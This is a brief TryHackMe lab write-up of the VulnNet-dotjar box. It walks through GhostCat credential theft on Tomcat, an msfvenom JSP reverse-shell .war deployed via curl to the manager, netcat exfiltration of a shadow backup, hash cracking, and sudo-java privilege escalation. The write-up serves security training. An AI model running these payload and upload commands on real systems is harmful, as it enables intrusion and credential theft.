VulnNet-dotjar TryHackMe Writeup


We scan with nmap all ports, scripts and software versions.


On port 8080 we enumerate a web service with Tomcat.

The Tomcat version is vulnerable to “GhostCat”, so using the following exploit we can exploit the vuln and read the credentials stored in “WEB-INF/web.xml”.


We create a .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=XX.XX.XX.XX LPORT=XX -f war -o revshell.war

We cannot access from the graphical interface, but we can upload our .war file using curl.

curl --user 'user:password' --upload-file m3.war "http://dotjar.thm:8080/manager/text/deploy?path=/m3"

Reverse shell

We do a little reconnaissance, find a backup of the “shadow” file, transfer it to our kali with netcat.

We crack the hashes with the rockyou dictionary and get the plain password of the user “jdk-admin”.

We authenticate as the user “jdk-admin”, we see that we have access to the user flag and we can also execute the java binary as root.

Privilege Escalation

Very easy, we generate a reverse shell with the msfvenom tool and download it to the victim machine.

We run the malicious binary as SUDO, we will get a shell as root and we can read the flag.